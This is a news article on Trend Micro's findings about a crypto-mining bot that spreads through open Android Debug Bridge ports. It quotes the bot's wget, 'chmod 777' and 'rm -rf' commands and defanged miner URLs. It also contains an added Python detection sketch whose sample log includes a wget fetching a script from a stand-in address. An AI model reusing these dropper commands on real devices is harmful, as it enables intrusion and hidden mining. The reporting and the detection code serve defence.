InsideBitcoins.com

Cybersecurity firm Trend Micro finds crypto malware on Android software

Trend Micro, the Tokyo-based “multinational cyber security and defense company,” recently reported on a cryptocurrency-mining bot that is infecting Android devices, according to CoinDesk.

Security threats are spread all over

According to Trend Micro, the malware has been seen in 21 different countries, most often in South Korea.

Essentially, the bot goes after Android Debug Bridge (ADB) ports. This is a serious problem because ADB is the system used to fix broken applications and other issues on an Android phone.

With default settings in place, these ports can be opened without authentication. The bot gets in through them and can then spread to any device that has previously shared an SSH connection with the infected one.

The publication reports that researchers have commented on the process a little further:

“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe. The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”

From there, the attack takes advantage of the command shell to change ADB execution permissions. It then uses the “wget” command to download from three miners, picks the best of those, and uses a “chmod 777 a.sh” command to change more permissions.

Then it hides itself from the host with another command, “rm -rf a.sh*”, which deletes the download. This command also hides its past and future trail.
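The command sequence described above (a download, then “chmod 777” on a script, then deletion of that script) can be looked for in shell command logs. The following detection sketch is an added example, not code from Trend Micro or the original article; the log format, host names and the documentation-range address are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: shell audit lines in a hypothetical
# "<time> host=<name> cmd=<command>" format (not from the Trend Micro report).
SAMPLE_LOG = """\
10:00:01 host=tv-box-01 cmd=wget http://203.0.113.7:8080/a.sh -O a.sh
10:00:02 host=tv-box-01 cmd=chmod 777 a.sh
10:00:03 host=tv-box-01 cmd=sh a.sh
10:00:09 host=tv-box-01 cmd=rm -rf a.sh*
10:01:00 host=build-02 cmd=wget https://example.org/tool.tgz
10:01:05 host=build-02 cmd=chmod 755 deploy.sh
10:02:00 host=phone-03 cmd=chmod 777 a.sh
10:02:01 host=phone-03 cmd=rm -rf a.sh*
"""

LINE = re.compile(r"^(\S+) host=(\S+) cmd=(.+)$")
DOWNLOAD = re.compile(r"^(?:wget|curl)\s.*https?://")
CHMOD = re.compile(r"^chmod\s+(?:-\S+\s+)*0?777\s+(\S+)")
REMOVE = re.compile(r"^rm\s+(?:-\S+\s+)+(\S+?)\*?$")

def find_dropper_chains(log_text):
    """Return [(host, script, time_of_delete)] for hosts that ran
    download -> chmod 777 <script> -> rm <script>, in that order."""
    state = defaultdict(lambda: {"downloaded": False, "chmod": set()})
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # ignore lines that are not in the expected format
        when, host, cmd = m.groups()
        s = state[host]
        if DOWNLOAD.search(cmd):
            s["downloaded"] = True
        elif (c := CHMOD.match(cmd)) and s["downloaded"]:
            s["chmod"].add(c.group(1))  # world-writable script after a download
        elif (r := REMOVE.match(cmd)) and r.group(1) in s["chmod"]:
            hits.append((host, r.group(1), when))  # cleanup completes the chain
            s["chmod"].discard(r.group(1))
    return hits

if __name__ == "__main__":
    for host, script, when in find_dropper_chains(SAMPLE_LOG):
        print(f"{when} {host}: download, chmod 777 and delete of {script}")
```

Only the host that performs all three steps in order is reported; a lone “chmod 777” or an ordinary download on its own is not flagged.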

The team found three miners sent into systems, all of which were served from the same address:

“http://198[.]98[.]51[.]104:282/x86/bash

http://198[.]98[.]51[.]104:282/arm/bash

http://198[.]98[.]51[.]104:282/aarch64/bash”

It then runs a few more optimizations to make the attack run even faster.

Overall, these attacks are becoming more and more common. In fact, Trend Micro found another attack on ADB systems last year, which they called the Satoshi Variant. It seems that users may want to start buying cryptocurrency instead of mining to stay far away from this threat.

      Cryptocurrency and games writer. Looking to the future by studying how these two industries can blend.